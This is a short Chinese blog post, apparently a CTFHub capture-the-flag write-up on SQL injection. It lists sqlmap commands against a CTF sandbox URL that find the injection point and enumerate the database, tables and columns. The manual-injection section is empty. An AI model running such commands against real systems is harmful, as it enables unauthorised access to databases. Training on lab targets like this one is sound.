SQL注入---數字型注入與字元型注入

2022-10-27 06:15:12

文章目錄

SQLMAP注入
手動注入

SQLMAP注入

①判斷注入點

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1”

發現是一個注入點

SQL注入---數字型注入與字元型注入

②查詢資料庫

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db

SQL注入---數字型注入與字元型注入

得到目前資料庫sqli

③查詢資料表(flag與news)

SQL注入---數字型注入與字元型注入

④查詢字段

sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” -D “sqli” -T “flag” --columns

SQL注入---數字型注入與字元型注入

手動注入

sql 資料庫SQL 導出資料

上一篇: ACM--steps--1.3.1--FatMouse' TradeFatMouse' Trade

下一篇: php中怎麼銷毀一個變量,php中用unset銷毀變量并釋放記憶體

繼續閱讀

oracle中的start with connect by用法
start with Oracle sql 遞歸查詢
08-07
JDBC連接配接資料庫（statement）
java修煉筆記資料庫 Java-我的大學生涯 java JDBC gui sql
08-07
MyBatis-Plus 之AR模式
java 後端 sql spring
11-09
ASP程式設計經典例子
asp 程式設計 sql 伺服器 application microsoft
08-07
ASP程式設計中20個非常有用的例子
asp 程式設計 microsoft sql 伺服器 application
08-07
龍珠訓練營task04
html sql html5
08-07
阿裡雲天池龍珠計劃SQL訓練營打卡
sql
08-07
阿裡雲天池龍珠計劃SQL訓練營day1
基礎學習 sql
08-07
實驗樓sql進階之成績管理系統的資料操作(window)
sql 實驗樓進階成績管理系統
08-07
Oracle的基本操作
Oracle sql 表空間
11-09
SQL優化SQL語句優化的目的
sql
08-07
JAVA高效程式設計指南
程式設計 java 資料結構 sql DAO
08-07
關于SQL語言
sql
08-07
SQL語言基礎：常用的資料查詢語句
資料庫 mysql java sql Oracle
08-07
neo4j之cypher使用文檔
資料庫 java sql mysql 正規表達式
08-07
sqlServer根據經緯查距離
sql
08-07